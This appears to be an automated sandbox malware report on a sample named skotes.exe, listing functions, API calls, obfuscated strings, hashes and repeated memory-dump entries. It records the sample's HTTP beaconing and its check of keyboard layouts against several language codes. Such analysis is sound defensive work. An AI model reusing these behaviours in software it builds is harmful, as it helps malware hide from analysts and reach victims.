Function 007BF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 007BF3A3

Strings

`'~, xrefs: 007BF375
8"~, xrefs: 007BF44B

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"~$`'~
API String ID: 3903695350-10081231
Opcode ID: ca93e78b4ff8da7b16310ce28ffad3d6c9d157592c633bfaf2fa6875f1990475
Instruction ID: 57ce17a0b5eb027aa8e997ea0ce86c989c2f93aa9d63570e0661dc64cbfde434
Opcode Fuzzy Hash: ca93e78b4ff8da7b16310ce28ffad3d6c9d157592c633bfaf2fa6875f1990475
Instruction Fuzzy Hash: 58313931600646EFEB21AA39DC49BDBB3E8EF00752F14442AE459D7599DF79AC80CB21

Analysis Process: skotes.exePID: 4148, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.3%
Total number of Nodes:	543
Total number of Limit Nodes:	57

Executed Functions

Function 007C2517 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 374
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,007D6758), ref: 007C275C

Strings

Eastern Summer Time, xrefs: 007C27FA
=L-t, xrefs: 007C2858
Eastern Standard Time, xrefs: 007C27CB
Xg}, xrefs: 007C2705, 007C270B

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: =L-t$Eastern Standard Time$Eastern Summer Time$Xg}
API String ID: 565725191-3469898719
Opcode ID: 3b33547e58485bd33f1633732227fc9538180e0ac1f39a3b7961853338819272
Instruction ID: 18398a07ebfde3cd2a441d781f1a4733d3d0fd308090d386e36cc536f8e38464
Opcode Fuzzy Hash: 3b33547e58485bd33f1633732227fc9538180e0ac1f39a3b7961853338819272
Instruction Fuzzy Hash: F3C12671A00245EFDB10AF689C85FAA7BB9EF55350F24409DE580AB253EB3D8E03C760

Function 007865E0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00786680

Strings

GSTmfV==, xrefs: 00786728
ISNmfV==, xrefs: 007867D1
RySfdMLx, xrefs: 0078669C
=L-t, xrefs: 007859F4, 00785C24, 00785EE6, 0078603B, 007865F7, 007870AC

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: =L-t$GSTmfV==$ISNmfV==$RySfdMLx
API String ID: 1484870144-3799260598
Opcode ID: f1fe8f5ddc9c48d03621b9f5c6a6ff81c87a25f592f83c49f23340a82e1eecc8
Instruction ID: fc64e1ebb4fe3c90ca39367766031ab6b92b1986774ab987f0b7cf6ce3f23202
Opcode Fuzzy Hash: f1fe8f5ddc9c48d03621b9f5c6a6ff81c87a25f592f83c49f23340a82e1eecc8
Instruction Fuzzy Hash: 3991C3B19401189BDB28EB68CC89BDDB779EB45304F4045EDE50997282EB389BC4CFA4

Function 0078BE30 Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 313
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000005DC,742D4C3D,?,00000000), ref: 0078BEB8
InternetOpenW.WININET(007D8DC8,00000000,00000000,00000000,00000000), ref: 0078BEC8
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0078BEEB
HttpOpenRequestA.WININET(?,00000000), ref: 0078BF35
HttpSendRequestA.WININET(?,00000000), ref: 0078BFF5
InternetReadFile.WININET(?,?,000003FF,?), ref: 0078C0A7
InternetCloseHandle.WININET(?), ref: 0078C187
InternetCloseHandle.WININET(?), ref: 0078C18F
InternetCloseHandle.WININET(?), ref: 0078C197

Strings

invalid stoi argument, xrefs: 0078E4F4
=L-t, xrefs: 0078C9B7, 0078C9BA
=L-t, xrefs: 0078BA04, 0078BE47, 0078C377, 0078CE6B, 0078DD2F
=L-t, xrefs: 0078C951
stoi argument out of range, xrefs: 0078E4EA
RE1NXF==, xrefs: 0078BF0E
8HJUeMD Lq5=, xrefs: 0078C465
8HJUeIfzLo==, xrefs: 0078C3CB, 0078C623

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$=L-t$=L-t$=L-t$RE1NXF==$invalid stoi argument$stoi argument out of range
API String ID: 2167506142-526263388
Opcode ID: 7acdb3d81a583ccb63821634468d4beefa335ec1cfa61241816e58650fc5777a
Instruction ID: c71a4533c6f8c0b5412a4fd46ab2784f98dfaf67f120a3c6bcd777175df57c6a
Opcode Fuzzy Hash: 7acdb3d81a583ccb63821634468d4beefa335ec1cfa61241816e58650fc5777a
Instruction Fuzzy Hash: 96B104B0A00118DBDB29DF28CC89B9DBB79EF45304F508199F508972D2DB399AC0CFA5

Function 00786020 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 275
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0078617D
RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00786271

Strings

0000043f, xrefs: 0078612B
=L-t, xrefs: 007859F4, 00785C24, 00785D67, 00785EE6, 0078603B, 007865F7, 007870AC
Keyboard Layout\Preload, xrefs: 00786054
00000423, xrefs: 007860FA
00000422, xrefs: 007860C9
00000419, xrefs: 00786098
=L-t, xrefs: 00785DB8, 00785E00, 00785DF4, 00785DC5, 00785EE0

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: EnumOpenValue
String ID: 00000419$00000422$00000423$0000043f$=L-t$=L-t$Keyboard Layout\Preload
API String ID: 2571532894-3786710308
Opcode ID: c06bc9db3bd43b93679a08ae4cf9f95aeed488a22ad130b322141fec7925e22b
Instruction ID: 29dd42edbedaa1e75a4d739149a1fafef4c5f5a52be021335fa7795e1508b50c
Opcode Fuzzy Hash: c06bc9db3bd43b93679a08ae4cf9f95aeed488a22ad130b322141fec7925e22b
Instruction Fuzzy Hash: 9CB1C071940168ABDF24DB54CC89BDEB779AF05340F5002D9E108E7292DB78AFA88F95

Function 00787D30 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00787ED3

Strings

Py, xrefs: 00787D3D
JjsrQV==, xrefs: 00788092
JjsrPl==, xrefs: 0078828A
=L-t, xrefs: 00787D5B
JjssOl==, xrefs: 0078813A
JjssPV==, xrefs: 007881E2

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
